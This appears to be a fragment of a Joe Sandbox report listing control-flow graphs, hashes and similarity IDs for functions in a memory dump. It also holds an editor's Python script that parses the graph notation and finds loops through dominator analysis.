                                                                                                          control_flow_graph 0 c20968-c20993 2 c20999-c20a2c QueryBSDRWindow 0->2 3 c20a2e-c20a30 0->3 2->3 42 c20a32 2->42 4 c20a37-c20a3c 3->4 6 c20a42-c20a7a 4->6 7 c20b1e-c20bc2 4->7 23 c20aa1-c20afc 6->23 24 c20a7c-c20a9a 6->24 44 c20bc8-c20c8b 7->44 45 c20c9e-c20ca7 7->45 62 c20b01 23->62 24->23 42->4 44->45 46 c20d51-c20d5a 45->46 47 c20cad-c20d3e 45->47 50 c20d7a-c20d83 46->50 51 c20d5c-c20d73 46->51 47->46 52 c20d85-c20d96 50->52 53 c20da9-c20db2 50->53 51->50 52->53 58 c20f33-c20f3a 53->58 59 c20db8-c20e06 53->59 78 c20f1c-c20f2d 59->78 62->7 78->58 81 c20e0b-c20e14 78->81 84 c20f40-c20fd1 81->84 85 c20e1a-c20f1a 81->85 113 c20fd7-c20fe8 84->113 114 c210ca 84->114 85->78 133 c20f3b 85->133 120 c20fea-c2100b 113->120 116 c210cc-c210d3 114->116 128 c21012-c21048 120->128 129 c2100d 120->129 138 c2104a 128->138 139 c2104f-c21077 128->139 129->128 133->84 138->139 143 c21079-c2107b 139->143 144 c2107d-c210a1 139->144 143->116 147 c210a3-c210a8 144->147 148 c210aa-c210b4 144->148 147->116 149 c210b6-c210b8 148->149 150 c210ba-c210c4 148->150 149->116 150->114 150->120
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.450809845.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_c20000_gay.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryWindow
                                                                                                          • String ID: :@!q$X1Hq
                                                                                                          • API String ID: 2116839266-3721188810
                                                                                                          • Opcode ID: 23b0161b563cf4f9b9c418b1fd395fdc680d39023f866f21d4ee1fd078f99c0f
                                                                                                          • Instruction ID: 840b8349e0898099712e621e12441288ff541d6267ebbcff8969551e1d4cb584
                                                                                                          • Opcode Fuzzy Hash: 23b0161b563cf4f9b9c418b1fd395fdc680d39023f866f21d4ee1fd078f99c0f
                                                                                                          • Instruction Fuzzy Hash: D3026034700215CFDB18FB78D85066D77E2AF88304B65857AE806DB3A6EF39AC42DB51
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 151 c2095b-c20993 153 c20999-c20a2c QueryBSDRWindow 151->153 154 c20a2e-c20a30 151->154 153->154 193 c20a32 153->193 155 c20a37-c20a3c 154->155 157 c20a42-c20a7a 155->157 158 c20b1e-c20bc2 155->158 174 c20aa1-c20afc 157->174 175 c20a7c-c20a9a 157->175 195 c20bc8-c20c8b 158->195 196 c20c9e-c20ca7 158->196 213 c20b01 174->213 175->174 193->155 195->196 197 c20d51-c20d5a 196->197 198 c20cad-c20d3e 196->198 201 c20d7a-c20d83 197->201 202 c20d5c-c20d73 197->202 198->197 203 c20d85-c20d96 201->203 204 c20da9-c20db2 201->204 202->201 203->204 209 c20f33-c20f3a 204->209 210 c20db8-c20e06 204->210 229 c20f1c-c20f2d 210->229 213->158 229->209 232 c20e0b-c20e14 229->232 235 c20f40-c20fd1 232->235 236 c20e1a-c20f1a 232->236 264 c20fd7-c20fe8 235->264 265 c210ca 235->265 236->229 284 c20f3b 236->284 271 c20fea-c2100b 264->271 267 c210cc-c210d3 265->267 279 c21012-c21048 271->279 280 c2100d 271->280 289 c2104a 279->289 290 c2104f-c21077 279->290 280->279 284->235 289->290 294 c21079-c2107b 290->294 295 c2107d-c210a1 290->295 294->267 298 c210a3-c210a8 295->298 299 c210aa-c210b4 295->299 298->267 300 c210b6-c210b8 299->300 301 c210ba-c210c4 299->301 300->267 301->265 301->271
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.450809845.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_c20000_gay.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryWindow
                                                                                                          • String ID: :@!q
                                                                                                          • API String ID: 2116839266-1708465744
                                                                                                          • Opcode ID: fb381575e678684f92c1a05a28b5e85bc427c5fc62e2caf3b2289b37a14c0919
                                                                                                          • Instruction ID: 698ed0853eb239c64d9ee61e2f93065e948a92e256a6efabcdb79f07914c81d9
                                                                                                          • Opcode Fuzzy Hash: fb381575e678684f92c1a05a28b5e85bc427c5fc62e2caf3b2289b37a14c0919
                                                                                                          • Instruction Fuzzy Hash: EFB18538705211CFDB14FB74E85066D37E3AF88308B65857AE506973AADF39AC42DB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 398 c20889-c208b3 QueryBSDRWindow 400 c208be-c20930 398->400
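The execution_graph and control_flow_graph lines in this section are flattened edge lists: `<id> <start>[-<end>]` opens a basic block, a bare word after it names an API called from that block, and `<a>-><b>` is an edge. The Python below is an added example by the editor, not code from the report or from Joe Sandbox. It parses that format, checks which blocks are reachable from the entry block, lists the API-calling blocks, and recovers the loops by computing dominators (an edge whose target dominates its source is a back edge, and the loop body is everything that reaches the source without passing through the target). The inputs are the graph of the c20968 function and the two-block c20889 graph exactly as printed in this report; the function names are the author's own.

```python
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^([0-9a-fA-F]+)(?:-([0-9a-fA-F]+))?$")


def parse_joe_graph(text):
    """'<id> <addr>[-<addr>]' opens a block, a following bare word is an API called
    in it, '<a>-><b>' is an edge. Returns ({id: block}, [(a, b), ...])."""
    tokens = text.split()
    if tokens and tokens[0] in ("control_flow_graph", "execution_graph"):
        tokens = tokens[1:]
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        am = ADDR_RE.match(tokens[i + 1]) if i + 1 < len(tokens) else None
        if tok.isdigit() and am:
            cur = int(tok)
            start = int(am.group(1), 16)
            end = int(am.group(2), 16) if am.group(2) else start
            nodes[cur] = {"start": start, "end": end, "apis": []}
            i += 2
            continue
        if cur is None:
            raise ValueError(f"label {tok!r} before any block")
        nodes[cur]["apis"].append(tok)        # e.g. QueryBSDRWindow
        i += 1
    return nodes, edges


def dominators(edges, entry):
    """Iterative set-based dominator computation over the blocks reachable from entry."""
    succs, preds = defaultdict(list), defaultdict(list)
    for u, v in edges:
        succs[u].append(v)
        preds[v].append(u)
    live, stack = set(), [entry]
    while stack:
        n = stack.pop()
        if n not in live:
            live.add(n)
            stack.extend(succs[n])
    dom = {n: set(live) for n in live}
    dom[entry] = {entry}
    changed = True
    while changed:
        changed = False
        for n in live - {entry}:
            new = set.intersection(*(dom[p] for p in preds[n] if p in live)) | {n}
            if new != dom[n]:
                dom[n], changed = new, True
    return dom, live, preds


def natural_loops(edges, entry):
    """Back edge u->v with v dominating u; body = v plus all blocks reaching u without v."""
    dom, live, preds = dominators(edges, entry)
    loops = {}
    for u, v in edges:
        if u in live and v in dom[u]:
            body, work = {v}, [u]
            while work:
                n = work.pop()
                if n not in body:
                    body.add(n)
                    work.extend(preds[n])
            loops[(u, v)] = body
    return loops, live


def summarize(text):
    nodes, edges = parse_joe_graph(text)
    entry = next(iter(nodes))                  # the report lists the entry block first
    loops, live = natural_loops(edges, entry)
    return {
        "nodes": len(nodes), "edges": len(edges),
        "range": (min(b["start"] for b in nodes.values()), max(b["end"] for b in nodes.values())),
        "unreachable": sorted(set(nodes) - live),
        "api_blocks": {n: b["apis"] for n, b in nodes.items() if b["apis"]},
        "back_edges": sorted(loops),
        "loop_sizes": {head: len(body) for (_, head), body in loops.items()},
    }


# Copied verbatim from the report's control_flow_graph lines above.
CFG_C20968 = (
    "control_flow_graph 0 c20968-c20993 2 c20999-c20a2c QueryBSDRWindow 0->2 3 c20a2e-c20a30 0->3 2->3 "
    "42 c20a32 2->42 4 c20a37-c20a3c 3->4 6 c20a42-c20a7a 4->6 7 c20b1e-c20bc2 4->7 23 c20aa1-c20afc 6->23 "
    "24 c20a7c-c20a9a 6->24 44 c20bc8-c20c8b 7->44 45 c20c9e-c20ca7 7->45 62 c20b01 23->62 24->23 42->4 44->45 "
    "46 c20d51-c20d5a 45->46 47 c20cad-c20d3e 45->47 50 c20d7a-c20d83 46->50 51 c20d5c-c20d73 46->51 47->46 "
    "52 c20d85-c20d96 50->52 53 c20da9-c20db2 50->53 51->50 52->53 58 c20f33-c20f3a 53->58 59 c20db8-c20e06 53->59 "
    "78 c20f1c-c20f2d 59->78 62->7 78->58 81 c20e0b-c20e14 78->81 84 c20f40-c20fd1 81->84 85 c20e1a-c20f1a 81->85 "
    "113 c20fd7-c20fe8 84->113 114 c210ca 84->114 85->78 133 c20f3b 85->133 120 c20fea-c2100b 113->120 "
    "116 c210cc-c210d3 114->116 128 c21012-c21048 120->128 129 c2100d 120->129 138 c2104a 128->138 "
    "139 c2104f-c21077 128->139 129->128 133->84 138->139 143 c21079-c2107b 139->143 144 c2107d-c210a1 139->144 "
    "143->116 147 c210a3-c210a8 144->147 148 c210aa-c210b4 144->148 147->116 149 c210b6-c210b8 148->149 "
    "150 c210ba-c210c4 148->150 149->116 150->114 150->120"
)
CFG_C20889 = "control_flow_graph 398 c20889-c208b3 QueryBSDRWindow 400 c208be-c20930 398->400"
```

For the c20968 function `summarize` reports 39 blocks, 56 edges, every block reachable from block 0, a single API-calling block (block 2), and two loops: a three-block loop headed at block 78 (78, 81, 85) and an eight-block loop headed at block 120. Block 133's jump back to 84 is a merge, not a loop, which is why the dominator test rather than "edge to a lower address" is used.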
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.450809845.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_c20000_gay.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2116839266-0
                                                                                                          • Opcode ID: f5044c5ef78d717cbf696c8c6abef14476e0394ac9062159a0d4258b0397ef2b
                                                                                                          • Instruction ID: 5908959d60c3c080bca071cff83ccf02c7db34520849a429ca6b704344c31106
                                                                                                          • Opcode Fuzzy Hash: f5044c5ef78d717cbf696c8c6abef14476e0394ac9062159a0d4258b0397ef2b
                                                                                                          • Instruction Fuzzy Hash: 39015E74608383DFCB04FB74D4944497BE2EB80308B64896DF085CB26AEA7D98849B52
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%